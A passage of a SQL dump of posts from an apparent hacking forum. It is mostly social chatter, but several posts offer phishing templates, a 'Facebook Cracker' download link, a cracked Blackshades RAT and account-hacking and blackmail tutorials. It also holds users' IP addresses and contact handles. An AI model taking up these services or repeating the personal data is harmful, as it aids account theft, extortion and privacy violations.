`ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('463', '159', '461', '49', 'RE: Editing Thread', '0', '1', 't3h jok3r', '1345498385', 'The edit time limit is 48 hours, you are free to edit under the time. There is no time limit for upgraded members. Thanks for the suggestion.', '41.174.22.118', '699274870', '1', '0', '0', '0', '1', '4c7749a7e02e630fa0e6030f4f656f41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('464', '158', '460', '42', 'RE: So ninja\'s DO exist?!', '0', '1', 't3h jok3r', '1345498572', 'I thought Ninja\'s were just a story to promote Karate, Martial Arts etc. From this I do believe they exist but if they do then I don\'t think he is the last one.', '41.174.22.118', '699274870', '1', '0', '0', '0', '1', '78a95a2326d2273d9be5f4526647cf05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('465', '147', '444', '42', 'RE: [Hacker news] BOTNET -The hacker news magazine', '0', '1', 't3h jok3r', '1345498674', '[quote=\'NXK\' pid=\'444\' dateline=\'1345420482\'] [quote=\'spacefish36\' pid=\'439\' dateline=\'1345417799\'] If their next conference is held in USA, then I would definitely go to the conference other wise not. What about you NXK? [/quote] I\'m canadian but id love to take a trip and check it out. [/quote] That would be expensive and useless because Delhi, India and Pakistan is a country with lots of poverty and there would be a communication problem.', '41.174.22.118', '699274870', '1', '0', '0', '0', '1', '128acefa336611b8a104be53b14ac746', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('466', '127', '451', '46', 'RE: Will make you a phisher website with theme you request.', '0', '64', 'vlajke', '1345502475', '[quote=\'HoverCatz\' pid=\'432\' dateline=\'1345408651\'] Ill send u a PM with the details :) [/quote] Your template is ready and has been ppmed to you. [quote=\'t3h jok3r\' pid=\'386\' dateline=\'1345244498\'] Thanks for the service vladjke. [/quote] Welcome. [quote=\'JakeUS\' pid=\'451\' dateline=\'1345431693\'] This is a very nice service you\'re doing. [/quote] Thank you.', '178.222.93.200', '-1294049848', '0', '0', '0', '0', '1', '9d5344e78853beddc170ba171694ba9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('467', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '64', 'vlajke', '1345502587', 'Come on, send us a direct link download pls. I\'ll give you a free drink afterwards.', '178.222.93.200', '-1294049848', '0', '0', '0', '0', '1', 'e4ae9f6a5915b50cf21307297dbdc58b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('468', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '5', 'Timmy', '1345502746', 'That sucks but if he is LQ then it was good.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', 'dd2340d15f880f3c45fc90bc5d6c0ae1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('469', '161', '0', '3', 'Congratz NXK', '0', '5', 'Timmy', '1345502850', 'I just noticed that he became a Moderator. Congratz and I think he will do a good job.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '0263288fe5503ee2750ef72fab731f10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('470', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '61', 'NXK', '1345502874', 'Thanks for this, I\'m excited to start in my new position!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '47b86e08b0f9fcdb388420e3d553f3a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('471', '158', '460', '42', 'RE: So ninja\'s DO exist?!', '0', '5', 'Timmy', '1345502951', 'I wish someone had a video on him.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '16338033243d590b72e306987cce8638', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('472', '161', '469', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345503251', 'Thank you very much for this :D I will do my best!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '66ecde748a989c39ceb96c65b64e5663', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('473', '161', '469', '3', 'RE: Congratz NXK', '0', '1', 't3h jok3r', '1345503813', 'I agree, he is a nice guy who is HQ and likes helping out people. I\'m looking forward to keep him on staff for a long time. I hope he stays with us and stays active. Good Luck and welcome on board NXK.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', 'ce63eb2193e0df7f59613011700ef09c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('474', '118', '297', '19', '[Junk]Test son', '0', '1', 't3h jok3r', '1345504689', 'This thread has been junked.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('475', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '5', 'Timmy', '1345505205', 'I don\'t have a direct link unfortunately because I don\'t run the blog.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '930287fd6381403346f36c5eb1771b80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('476', '162', '0', '7', 'Applying for that swag award ;)', '0', '61', 'NXK', '1345505359', '[img]https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-ash4/395841_10151158763015012_33782960_n.jpg[/img] I hope I can get it aha!', '99.253.65.17', '1677541649', '0', '0', '1', '1345554435', '1', 'beb9dce94854df8b907d3c229cea4a22', '0', '1345554435'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('477', '162', '476', '7', 'RE: Applying for that swag award ;)', '0', '1', 't3h jok3r', '1345505675', 'What a comment. I have to admit it.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '0b6fed7ff33af7f6a5e7d54ca2582109', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('478', '130', '436', '15', 'RE: Skype IP Finder - FREE', '0', '9', 'p420', '1345505901', '[quote=\'t3h jok3r\' pid=\'436\' dateline=\'1345417138\'] Honestly, I didn\'t know I was ever going to need this but this skid wanted to scam me on Skype so I sent him his IP and location and he actually paid me as in a apology. [/quote] :roflol::roflol::roflol: I can\'t stop laughing.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', '9500587573f16764125bb7630d014ce0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('479', '94', '457', '16', 'RE: What is this section about?', '0', '9', 'p420', '1345505982', '[quote=\'sirchamp\' pid=\'457\' dateline=\'1345469119\'] Nearly the exact same text on wikipedia. But thanks anyway :D [/quote] Grrrr.. You had to do your research.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', 'b502f90360ac47e1d6b67e5ffc0e14c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('480', '134', '341', '47', 'RE: Win $10 for referring people', '0', '9', 'p420', '1345506034', 'I\'ll try my best to get some members :D', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', '5e255515fa3e391d3fb0ce2d148b2c5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('481', '65', '156', '41', 'RE: Auction Thread Guidelines', '0', '9', 'p420', '1345506120', 'Reasonable questions. The code text color is a bit hard to see, I can see easily actually it\'s OK because it\'s not something that we need to put our eyes on.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', '42c56464c66670eba4417873cc0bf209', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('482', '132', '338', '20', 'RE: [Forever FUD]No Dependency Crypter!', '0', '1', 't3h jok3r', '1345506158', 'Sorry guys but I took it from somewhere so can\'t provide a direct download link.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', '3bdd5483de474aeffe076e63d73e82e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('483', '163', '0', '30', '[REAL]Facebook Cracker', '0', '1', 't3h jok3r', '1345509386', '[img]https://lh6.googleusercontent.com/-cazo2Slwt1Y/T3k0LfdpL3I/AAAAAAAADS0/-jGFbM069FQ/s462/facebook+cracker.PNG[/img] Enjooy guys, seen many posts & ppl that looking for a FB cracker so.... :cool: [i]And this time no Fucking rats or virus![/i] [i][b]Suprime clean[/b][/i] >:) DL=> http://rghost.net/39261807 Dont forget 2 say [b]thanks[/b]... [u]No $hitcash...[/u]', '41.174.59.210', '699284434', '1', '0', '1', '1345641114', '1', '6e4573e3111a73d890bcd0bb7085d32f', '0', '1345641114'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('484', '164', '0', '28', 'Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345509447', 'Post your feedbacks on the upgrade.', '41.174.59.210', '699284434', '1', '0', '0', '0', '1', 'a07de986868c83e0d99afcd7c030e07f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('485', '26', '79', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '7', 'Romdu62', '1345510321', 'This is the best E-Whoring tutorial I have seen in my life. Thanks.', '41.174.59.210', '699284434', '0', '0', '0', '0', '1', 'dd3e8ebe680feb406c82e9b79c86799e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('520', '155', '499', '3', 'RE: [Admin]?????? demoted', '0', '1', 't3h jok3r', '1345554495', '[quote=\'Baws\' pid=\'499\' dateline=\'1345529411\'] Aww I saw him before, I think I have more posts than him. [/quote] Yes, you have 4 more posts than him. If actually was active then his post count would be around 50.', '41.174.12.163', '699272355', '1', '0', '0', '0', '1', 'cf681e12f76502659068a4af7ea3aa75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('487', '120', '301', '4', 'RE: reloadz0r is here', '0', '61', 'NXK', '1345520046', 'Welcome! I hope you enjoy it here.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'c021fa6211ecdc787adf6451692823bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('488', '161', '469', '3', 'RE: Congratz NXK', '0', '82', 'iTzIpod', '1345520270', 'Congratulations on Mod! =] Good Luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9ebc5aad1934a4d95ce5fa8e329cfa6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('489', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '82', 'iTzIpod', '1345520696', 'Here\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url] You\'re welcome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1510beb2bfa0298f43f65b1d9acb418a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('490', '161', '469', '3', 'RE: Congratz NXK', '0', '20', 'JakeUS', '1345521194', 'Congratulations, welcome to the team!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'bd429c621d632096939cda64e725dae5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('491', '120', '301', '4', 'RE: reloadz0r is here', '0', '20', 'JakeUS', '1345521263', 'Enjoy the site, and if you need help just PM a Staff member.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e820cf998c33ac3e9227e4d086a89f52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('492', '165', '0', '5', 'Just did something', '0', '20', 'JakeUS', '1345521453', 'I just asked an Admin I am friends with on a popular forum if I could post about this site. If he says yes, we will get a lot of members!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '72b6c7d7b37e45d8c4ff6f0da1845eb5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('493', '166', '0', '49', 'New userbars?', '0', '20', 'JakeUS', '1345521887', 'I don\'t like the current ones, they are too \"plain\". I can get a friend to make really good ones if you want.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '73c2b1c9ffdfdb406636928e7b48add8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('494', '167', '0', '4', 'iTzIpod is here (:', '7', '82', 'iTzIpod', '1345522131', 'Hey LH,I am iTzIpod. Please. Allow me to introduce myself! Anyways. I\'m a friendly member, and my real name is Ryan. But please call me Jacob. It\'s my nickname. And I also have a PS3. I play Call of Duty Black Ops a lot. And who knows? Maybe we can party up and whip some asses together? If you\'re interested, add my PSN: SoaR_iPod or SoaR__Drastic or iTzExtremeIpod. I also have Skype. Skype ID: iTzIpod. Feel free to add me. And don\'t forget to add me on MSN too! It\'s iTzIpod@hotmail.com. I will be active on this forum. Anyways, back on topic. I will be active on this forum L33t Hacking and I will dedicate myself to this forum. -iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1347719411', '1', 'a24aa6c688ed349caf7c57270fdb0627', '0', '1347719411'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2073', '448', '0', '61', 'Broken Links', '0', '82', 'iTzIpod', '1347720178', 'If you notice any broken links, please PM me. As I will fix them. Thanks =] - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aada2a5e46e4488e1d5aa4ab67ddaee0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2074', '449', '0', '35', 'Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1347720779', '[img]http://i.imgur.com/3Q7JN.png[/img] Rate /10? CnC please? Thanks -iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '545590da2fc1bfa75ff862587077d30e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2075', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347720890', 'My attemps: [URL=http://imgur.com/Mul6K][IMG]http://i.imgur.com/Mul6K.png[/IMG][/URL] [URL=http://imgur.com/fmK09][IMG]http://i.imgur.com/fmK09.png[/IMG][/URL] [URL=http://imgur.com/ZX8Ku][IMG]http://i.imgur.com/ZX8Ku.png[/IMG][/URL] [URL=http://imgur.com/xyMsA][IMG]http://i.imgur.com/xyMsA.png[/IMG][/URL] [URL=http://imgur.com/uDY9P][IMG]http://i.imgur.com/uDY9P.png[/IMG][/URL]', '89.214.126.254', '1507229438', '1', '0', '0', '0', '1', 'e5747e17f2e3ceb36c975a0331387a3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('495', '166', '493', '49', 'RE: New userbars?', '0', '61', 'NXK', '1345523116', 'I like my user bar, But change is always nice.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '9e61ee06b23db82dd99bb0f6b8a79f84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('496', '161', '469', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345524866', 'Thanks everyone :) Means alot aha. If you need help with anything let me know.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '1c46071006a8a5ffb98fb6d90691dc49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('497', '134', '341', '47', 'RE: Win $10 for referring people', '0', '84', 'Thunder™', '1345525030', 'I will try to refer members', '111.91.75.129', '1868254081', '0', '0', '0', '0', '1', 'b86d41ff3eabceab91bde9f92dcbceb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('498', '161', '469', '3', 'RE: Congratz NXK', '0', '2', 'Apathy', '1345527739', 'welcome to the forums.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'fd6451d7feba1043334264e7308b986c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('499', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '55', 'Baws', '1345529411', 'Aww I saw him before, I think I have more posts than him.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '0a63258338932031c143924eb5790081', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('500', '161', '469', '3', 'RE: Congratz NXK', '0', '55', 'Baws', '1345529467', 'Nice, hope he doesn\'t abuse his position. :D', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b38e18cccdcdcfd572064b8bee3fec4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('501', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '55', 'Baws', '1345529514', 'Hi Ryan, or Jacob? Welcome on here, I got a ps3 too and msg me if you want so I can add you! PSN: Rest_In_Peace911', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'f1158cf3ecbc49077a5fbc0f9a03075d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('502', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '55', 'Baws', '1345529580', 'Nice share. So this is like a bruteforcer?', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1521a878d3a1d7240435035d94ebafd1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('503', '146', '375', '29', 'RE: se7en sins PREMIUM SECTION', '0', '55', 'Baws', '1345529644', 'Now that\'s what I\'m talking about. PORNO!! @OP, oh yeah thanks. ;)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'a735188f060aba76740e7a59ace150b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('504', '142', '369', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '55', 'Baws', '1345529696', 'Can anyone confirm this isn\'t a backdoor?(As in OP infected it)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '84ced20cc3dbcef4937965b3964a7cb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('505', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '55', 'Baws', '1345529809', '5 views and no replies, I\'ll be the first. It sure has lots of useful information, but we\'ll need more topics. As much as I wanna share what I know, I think most of what I know is known and easily found/learned with Google.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '5e9e7a04d0c8f4f0cca9337dd728253d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('506', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '55', 'Baws', '1345529908', 'Thanks for the tutorial, I\'ve tried it before and failed tho. >.<', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'fe81f385d516551f9f213c58db3c974f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('507', '168', '0', '50', ':(', '0', '54', 'Sin Cara', '1345533202', 'i just demoted to basic...... and the sad thing is that i just trusted admin and he did not:(', '119.154.95.168', '2006605736', '1', '0', '0', '0', '1', '6e800dd231bf0c8f545523738cbf1503', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('508', '161', '469', '3', 'RE: Congratz NXK', '0', '62', 'R?????zo?', '1345536342', 'Congratz on the promotion bro :)', '46.50.87.75', '775051083', '1', '0', '0', '0', '1', 'de636ef294e8f662128655ec926efa81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, 